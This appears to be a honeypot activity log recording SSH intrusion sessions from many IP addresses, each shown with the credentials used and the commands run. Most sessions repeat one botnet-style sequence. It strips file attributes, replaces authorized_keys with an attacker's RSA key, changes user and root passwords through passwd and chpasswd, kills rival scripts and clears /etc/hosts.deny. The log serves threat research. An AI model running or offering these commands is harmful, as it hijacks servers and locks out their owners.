$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123qweasd\nrRp8kfGBPXDf\nrRp8kfGBPXDf"|passwd|bash
$ Enter new UNIX password:
$ echo "123qweasd\nrRp8kfGBPXDf\nrRp8kfGBPXDf\n"|passwd
🎭 eagle_root_23 (172.172.196.177) β€” Boydton, United States Β· 1 session Β· 20 cmds
2026-05-30 22:15 EDT Β· as user/user.
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user.\nzOlY4Sy9OWId\nzOlY4Sy9OWId"|passwd|bash
$ Enter new UNIX password:
$ echo "user.\nzOlY4Sy9OWId\nzOlY4Sy9OWId\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_19 (110.166.67.189) β€” Xining, China Β· 2 sessions Β· 40 cmds
2026-05-07 02:23 EDT Β· as frappe/P@ssw0rd, ftpuser/qwert12345
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "P@ssw0rd\n0KqFmBvOOqvJ\n0KqFmBvOOqvJ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "P@ssw0rd\n0KqFmBvOOqvJ\n0KqFmBvOOqvJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "qwert12345\nOupZKsgehox0\nOupZKsgehox0"|passwd|bash
$ echo "qwert12345\nOupZKsgehox0\nOupZKsgehox0\n"|passwd
🎭 seoul (221.162.214.111) β€” Dong-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-30 21:58 EDT Β· as alex/123qweasd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123qweasd\noKLnmy7X57Dq\noKLnmy7X57Dq"|passwd|bash
$ Enter new UNIX password:
$ echo "123qweasd\noKLnmy7X57Dq\noKLnmy7X57Dq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_27 (209.99.189.174) β€” San Francisco, United States Β· 1 session Β· 20 cmds
2026-05-30 21:58 EDT Β· as frappe/P@ssw0rd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\nqRVb1vQDqI4Y\nqRVb1vQDqI4Y"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nqRVb1vQDqI4Y\nqRVb1vQDqI4Y\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_8 (107.189.23.48) β€” Zaandam, Netherlands Β· 1 session Β· 20 cmds
2026-05-30 21:55 EDT Β· as frappe/P@ssw0rd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\nRhJMKpbQbvba\nRhJMKpbQbvba"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nRhJMKpbQbvba\nRhJMKpbQbvba\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_42 (188.166.215.16) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-30 19:38 EDT Β· as mahdi/mahdi, root/123456@a
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "mahdi\n6hkCY3ReeDV6\n6hkCY3ReeDV6"|passwd|bash
$ Enter new UNIX password:
$ echo "mahdi\n6hkCY3ReeDV6\n6hkCY3ReeDV6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:qysyD4oa5545"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 tiger_root_10 (34.93.128.179) β€” Mumbai, India Β· 1 session Β· 20 cmds
2026-05-30 19:23 EDT Β· as mahdi/mahdi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mahdi\nwVLs3lQMtzwP\nwVLs3lQMtzwP"|passwd|bash
$ Enter new UNIX password:
$ echo "mahdi\nwVLs3lQMtzwP\nwVLs3lQMtzwP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 scone_root_4 (45.89.63.39) β€” Coventry, United Kingdom Β· 2 sessions Β· 38 cmds
2026-05-30 17:07 EDT Β· as root/!QAZXSW@123, root/qwerty-12
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:NZgETIUJXU0y"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:HrXYuQ0vqNHY"|chpasswd|bash
🎭 cowboy_root_28 (43.166.242.149) β€” Ashburn, United States Β· 2 sessions Β· 38 cmds
2026-05-30 17:14 EDT Β· as root/!QAZXSW@123, root/qwerty-12
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:ylk3wnEpTTh3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:sWwsIZWEMIGI"|chpasswd|bash
🎭 eagle_root_11 (174.35.25.181) β€” Ashburn, United States Β· 7 sessions Β· 139 cmds
2026-05-24 19:01 EDT Β· as cloud/Wangsu@2017, curl/welltech12, geo/geo
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—7 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—7 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—7 // CPU profiling
$ echo -e "geo\nW1YeduRh4wIE\nW1YeduRh4wIE"|passwd|bash
$ Enter new UNIX password: Γ—6
$ echo "geo\nW1YeduRh4wIE\nW1YeduRh4wIE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—7 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—7
$ ls -lh $(which ls) Γ—7
$ which ls Γ—7
$ crontab -l Γ—7 // persistence setup
$ w Γ—7 // logged-in users check
$ uname -m Γ—7
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—7 // CPU profiling
$ top Γ—7 // process monitoring
$ uname Γ—7 // OS identification
$ uname -a Γ—7 // OS/kernel identification
$ whoami Γ—7 // privilege check
$ lscpu | grep Model Γ—7
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—7
$ echo -e "123\nHdcQahoNXvC7\nHdcQahoNXvC7"|passwd|bash
$ echo "123\nHdcQahoNXvC7\nHdcQahoNXvC7\n"|passwd
$ echo -e "welltech12\n7eSB57hYFYJr\n7eSB57hYFYJr"|passwd|bash
$ echo "welltech12\n7eSB57hYFYJr\n7eSB57hYFYJr\n"|passwd
$ echo -e "Wangsu@2017\nxrNw1Xcpigud\nxrNw1Xcpigud"|passwd|bash
$ echo "Wangsu@2017\nxrNw1Xcpigud\nxrNw1Xcpigud\n"|passwd
$ echo "root:PAYsPMHWixmG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "welltech12\nWLbZR6OXUu9H\nWLbZR6OXUu9H"|passwd|bash
$ echo "welltech12\nWLbZR6OXUu9H\nWLbZR6OXUu9H\n"|passwd
$ echo -e "scheduler\nDzS9WmdS1HYY\nDzS9WmdS1HYY"|passwd|bash
$ echo "scheduler\nDzS9WmdS1HYY\nDzS9WmdS1HYY\n"|passwd
🎭 ghost_root_58 (180.93.3.33) β€” QuαΊ­n Bα»‘n, Vietnam Β· 3 sessions Β· 60 cmds
2026-05-30 16:39 EDT Β· as geo/geo, liu/123, sun/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\n6AlgRqt7eSlL\n6AlgRqt7eSlL"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123\n6AlgRqt7eSlL\n6AlgRqt7eSlL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\nlnAXtzGoCdlG\nlnAXtzGoCdlG"|passwd|bash
$ echo "123456\nlnAXtzGoCdlG\nlnAXtzGoCdlG\n"|passwd
$ echo -e "geo\np6vdYkD6cyE3\np6vdYkD6cyE3"|passwd|bash
$ echo "geo\np6vdYkD6cyE3\np6vdYkD6cyE3\n"|passwd
🎭 ghost_root_59 (43.133.61.254) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-30 16:37 EDT Β· as liu/123, sun/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\ncIhtMqjUS65m\ncIhtMqjUS65m"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\ncIhtMqjUS65m\ncIhtMqjUS65m\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\nPSykQoKiHBSs\nPSykQoKiHBSs"|passwd|bash
$ echo "123\nPSykQoKiHBSs\nPSykQoKiHBSs\n"|passwd
🎭 wraith_root_45 (131.196.14.35) β€” Quevedo, Ecuador Β· 3 sessions Β· 60 cmds
2026-05-30 16:38 EDT Β· as geo/geo, liu/123, sun/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\n16OKRX5djNSx\n16OKRX5djNSx"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123\n16OKRX5djNSx\n16OKRX5djNSx\n"|passwd
